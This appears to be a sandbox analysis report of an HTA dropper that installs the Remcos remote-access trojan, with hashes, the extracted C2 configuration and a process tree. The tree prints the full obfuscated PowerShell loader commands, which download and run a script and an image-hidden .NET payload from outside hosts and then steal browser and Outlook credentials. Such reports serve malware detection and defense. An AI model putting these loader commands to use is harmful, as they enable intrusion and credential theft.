Analysis
-
max time kernel
147s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2025 08:29
Static task
static1
Behavioral task
behavioral1
Sample
greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta
Resource
win10v2004-20241007-en
General
-
Target
greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta
-
Size
252KB
-
MD5
9fb8a902f8fed32164687eacbc011faa
-
SHA1
7e2c1b3241c142946709366d053a0a458dcb6b3f
-
SHA256
42b3442bc675f7ff95d660935ea8756710fea99551b1d614f2e8b7db739d72a0
-
SHA512
3de9bde1a8ed6d6b974e541241009e2c18ed74d9ce777129d59a0c5df0306a6494d02b212a651769ce523b8d14da20f1f8d2774508e6979daeee79e883d2c4aa
-
SSDEEP
768:PD2dFEfY7Xw8LcGdgtF/UT1JrXkUBDbzuJqAakf4vlOGd5cqjk1FJZuO+yIF9OQ5:NzNtyht97
Malware Config
Extracted
remcos
zynova
newbigupdateforme.duckdns.org:14646
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-ID1P7W
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1784-104-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/4568-110-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/948-105-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/948-105-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/1784-104-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 15 3416 powershell.exe 18 3380 powershell.exe 19 3380 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2452 cmd.exe 3416 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 3380 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3380 set thread context of 1084 3380 powershell.exe 97 PID 1084 set thread context of 1784 1084 CasPol.exe 99 PID 1084 set thread context of 948 1084 CasPol.exe 101 PID 1084 set thread context of 4568 1084 CasPol.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3416 powershell.exe 3416 powershell.exe 3380 powershell.exe 3380 powershell.exe 1784 CasPol.exe 1784 CasPol.exe 4568 CasPol.exe 4568 CasPol.exe 1784 CasPol.exe 1784 CasPol.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1084 CasPol.exe 1084 CasPol.exe 1084 CasPol.exe 1084 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 3416 powershell.exe Token: SeDebugPrivilege 3380 powershell.exe Token: SeDebugPrivilege 4568 CasPol.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 396 wrote to memory of 2452 396 mshta.exe 85 PID 396 wrote to memory of 2452 396 mshta.exe 85 PID 396 wrote to memory of 2452 396 mshta.exe 85 PID 2452 wrote to memory of 3416 2452 cmd.exe 87 PID 2452 wrote to memory of 3416 2452 cmd.exe 87 PID 2452 wrote to memory of 3416 2452 cmd.exe 87 PID 3416 wrote to memory of 4900 3416 powershell.exe 89 PID 3416 wrote to memory of 4900 3416 powershell.exe 89 PID 3416 wrote to memory of 4900 3416 powershell.exe 89 PID 4900 wrote to memory of 3088 4900 csc.exe 90 PID 4900 wrote to memory of 3088 4900 csc.exe 90 PID 4900 wrote to memory of 3088 4900 csc.exe 90 PID 3416 wrote to memory of 2268 3416 powershell.exe 91 PID 3416 wrote to memory of 2268 3416 powershell.exe 91 PID 3416 wrote to memory of 2268 3416 powershell.exe 91 PID 2268 wrote to memory of 3380 2268 WScript.exe 92 PID 2268 wrote to memory of 3380 2268 WScript.exe 92 PID 2268 wrote to memory of 3380 2268 WScript.exe 92 PID 3380 wrote to memory of 876 3380 powershell.exe 95 PID 3380 wrote to memory of 876 3380 powershell.exe 95 PID 3380 wrote to memory of 876 3380 powershell.exe 95 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 3380 wrote to memory of 1084 3380 powershell.exe 97 PID 1084 wrote to memory of 1784 1084 CasPol.exe 99 PID 1084 wrote to memory of 1784 1084 CasPol.exe 99 PID 1084 wrote to memory of 1784 1084 CasPol.exe 99 PID 1084 wrote to memory of 1784 1084 CasPol.exe 99 PID 1084 wrote to memory of 2864 1084 CasPol.exe 100 PID 1084 wrote to memory of 2864 1084 CasPol.exe 100 PID 1084 wrote to memory of 2864 1084 CasPol.exe 100 PID 1084 wrote to memory of 948 1084 CasPol.exe 101 PID 1084 wrote to memory of 948 1084 CasPol.exe 101 PID 1084 wrote to memory of 948 1084 CasPol.exe 101 PID 1084 wrote to memory of 948 1084 CasPol.exe 101 PID 1084 wrote to memory of 4568 1084 CasPol.exe 102 PID 1084 wrote to memory of 4568 1084 CasPol.exe 102 PID 1084 wrote to memory of 4568 1084 CasPol.exe 102 PID 1084 wrote to memory of 4568 1084 CasPol.exe 102
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatturningpointofentirelifegivenmebestthingsforgetbacktome.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c powERshELl.exe -EX byPasS -NoP -w 1 -C deVICECrEDentIaLDePLOYmEnt.EXe ; iEx($(iEX('[sYsTEM.texT.EnCodiNG]'+[chAr]58+[Char]0x3A+'utF8.gEtSTRINg([syStEm.coNVert]'+[ChAR]0x3A+[CHAr]58+'froMBaSE64StrIng('+[Char]0X22+'JEFFbFNEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUkRFZklOaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0dIWGhOYlBWTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNTVlVJTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdmEsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUUdtYU55UWR2cixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQk5yaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3dhYVJhV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBRWxTRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNS4xMjUuMjQ2LjU0L3hhbXBwL25jby9uaWNldG9nZXRtZWJlc3R0aGluZ3N3aXRoZ3JlYXRuYmVzdHRoaW5nc2lnb3Rmcm9tZXZlcnkuZ0lGIiwiJEVudjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyIsMCwwKTtTdGFSVC1TTEVlcCgzKTtpTlZvS0UtRVhQUmVzc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyI='+[cHar]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowERshELl.exe -EX byPasS -NoP -w 1 -C deVICECrEDentIaLDePLOYmEnt.EXe ; iEx($(iEX('[sYsTEM.texT.EnCodiNG]'+[chAr]58+[Char]0x3A+'utF8.gEtSTRINg([syStEm.coNVert]'+[ChAR]0x3A+[CHAr]58+'froMBaSE64StrIng('+[Char]0X22+'JEFFbFNEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUkRFZklOaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0dIWGhOYlBWTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXNTVlVJTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdmEsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUUdtYU55UWR2cixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQk5yaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3dhYVJhV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBRWxTRDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEzNS4xMjUuMjQ2LjU0L3hhbXBwL25jby9uaWNldG9nZXRtZWJlc3R0aGluZ3N3aXRoZ3JlYXRuYmVzdHRoaW5nc2lnb3Rmcm9tZXZlcnkuZ0lGIiwiJEVudjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyIsMCwwKTtTdGFSVC1TTEVlcCgzKTtpTlZvS0UtRVhQUmVzc2lPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXG5pY2V0b2dldG1lYmVzdHRoaW5nc3dpdGhncmVhdG5iZXN0dGhpbmdzaWdvdGZyb21ldmVyLnZicyI='+[cHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jcx3jmnm\jcx3jmnm.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFB4.tmp" "c:\Users\Admin\AppData\Local\Temp\jcx3jmnm\CSCD04E12D28F77441E8ADD8C6AEBB8B34.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:3088
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetogetmebestthingswithgreatnbestthingsigotfromever.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnACMAeAAjAC4AcwBnAG4AaQBoACMAIwBzAGUAYgBlAG0AZQBzAG8AcgBmAG8AbABsAGkAawBzAGUAYwBpAG4ALwBvAGMAbgAvAHAAcABtAGEAeAAvADQANQAuADYANAAyAC4ANQAyADEALgA1ADMAMQAvAC8AOgBwACMAIwBoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMAAwADgAMAA5ADgALwBlAGYAcABxAG4AdgBoADgAeAB4AG4AMQBjAGQAMwB2AHEAbABiAGQALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAJwAsACcAJwAsACcAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAsACcAdABvAHIAcgBvAG4AdABlAHMAJwAsACcAdgBiAHMAJwAsACcAMQAwADAAJwAsACcAMQAnACwAJwBwAHMAZQB1AGQAbwBtAGUAcgB5ACcAKQApAA==')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\torrontes.vbs"6⤵
- System Location Discovery: System Language Discovery
PID:876
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\qvbogxfkurpixhpchv"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\axohhpqeizhvznlgqfato"7⤵PID:2864
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\axohhpqeizhvznlgqfato"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\dstzzibgehzajczkzqnmzduzs"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
19KB
MD502888b8c01fdfcbbe1dac5af14ee55d1
SHA1e197a4c5b37e32a32555cb26fae143de19210b88
SHA256059a4fbf457bf1c46f252f997c440df8f0907081f9631786c7a25f6d49209118
SHA512cb30c6cea789214e1f8a183744781563f8cf946d67b87471e2e6a3dc4c26f89cb0029c073e05c1da9b5e6b2fca982a36c2e21ff4dd6903b7ee6b07d02f0dd751
-
Filesize
1KB
MD515ba917837122f73891069f6b865fd6e
SHA18b6b2d98622e955c94c01bd0d0f830dc708832ae
SHA256aad0ae2df2117dc30a3a9bf656d31bf2748b5b61c61fd8d30c1e04f3258d642f
SHA512e4f9e0881c7177ffed870756bd7a5ce826b977115d81f30cf7ee450b4462d28047180001ee16e6fd1493d99ba40484cfea4830e3c9d9292036ae8d4c0d80b1ce
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD503ecb36743bd3f3295ae983c5bd4a105
SHA16ec1b0c554b588d979b17ac260cb4d5dde4755f5
SHA256d6ad0c194c6f103a9d8010f151b7cccbf4804dc5eb0dac829b6061b96840f0c1
SHA512c7cf631c3f9d739af04f3567e93e47bc238bd93887e61c428b4577f9f2126bb75870716642e91c6a01b093d72bbf5fb91987acaf06daf14e5362d25604cc636c
-
Filesize
4KB
MD517eece3240d08aa4811cf1007cfe2585
SHA16c10329f61455d1c96e041b6f89ee6260af3bd0f
SHA2567cc0db44c7b23e4894fe11f0d8d84b2a82ad667eb1e3504192f3ba729f9a7903
SHA512a7de8d6322410ec89f76c70a7159645e8913774f38b84aafeeeb9f90dc3b9aa74a0a280d0bb6674790c04a8ff2d059327f02ebfda6c4486778d53b7fc6da6370
-
Filesize
236KB
MD5ff09c5a85cbd9857d9421bc214ec2fe1
SHA1074bf8a3172008654a2541b851bf4590cd5ef216
SHA2568c8eea1183ab058182154e705f9a518e4950cbd9b7de8c787e5e943f57aee3ca
SHA5121a7769ba52d3bc4ecaf7d935656af12bf54f1b4f2bcf8dea9c9c50d6ea7dc261fb45f91ab7a1ff9e186b6db0df3330ca2ccfa66ed4811f4acbb07f980663f3eb
-
Filesize
652B
MD5d5f4019303cdaa11fd7b14860b4dcf9e
SHA18b7d99403e043bf93d338b643617b24ed060d043
SHA256ed33e8e37764a660d8c8257a4487248f12fceeab6e4bf601ec4cdf4e69623abc
SHA512377d101531a2589f0ee99bac5f5726179a0ea9c805c8ec4c29f189845592f7bf52a2bb779808af834275c851b97aae804959144bb69613966651757fc608ac39
-
Filesize
482B
MD51f56a0f3efea0531ce22c4a0338cbf36
SHA14c802df944c3a34b94a85ce2211b2a022cbdd90c
SHA25670ea60da378dd321ba63296b8ec869bace7f330f2d32a0113368bd1bf62976a7
SHA5128bcca67defcc801d095ae338890e521b13b6fed91861b9584b4af3a130e3edac1f06b49ec403cab61e9b5e9137280501503f10cc5a8ffc3cc93a1d759b60649a
-
Filesize
369B
MD5b63c9905159530c211496c331e1a6e2b
SHA169fd66150c80d8f87fabcbef523976ace1ded179
SHA256164d509521ccd792b4e885adf186547e3c59291b59b4cac565bb9ddcc3a0cc8a
SHA512b2c480b8d6342415d98dd5866a13785fab3723a73772ad195d649a1c54428b8f5fb5a2353849851293cc8841367310be9e3f6761f60e0f0442406b362e33c314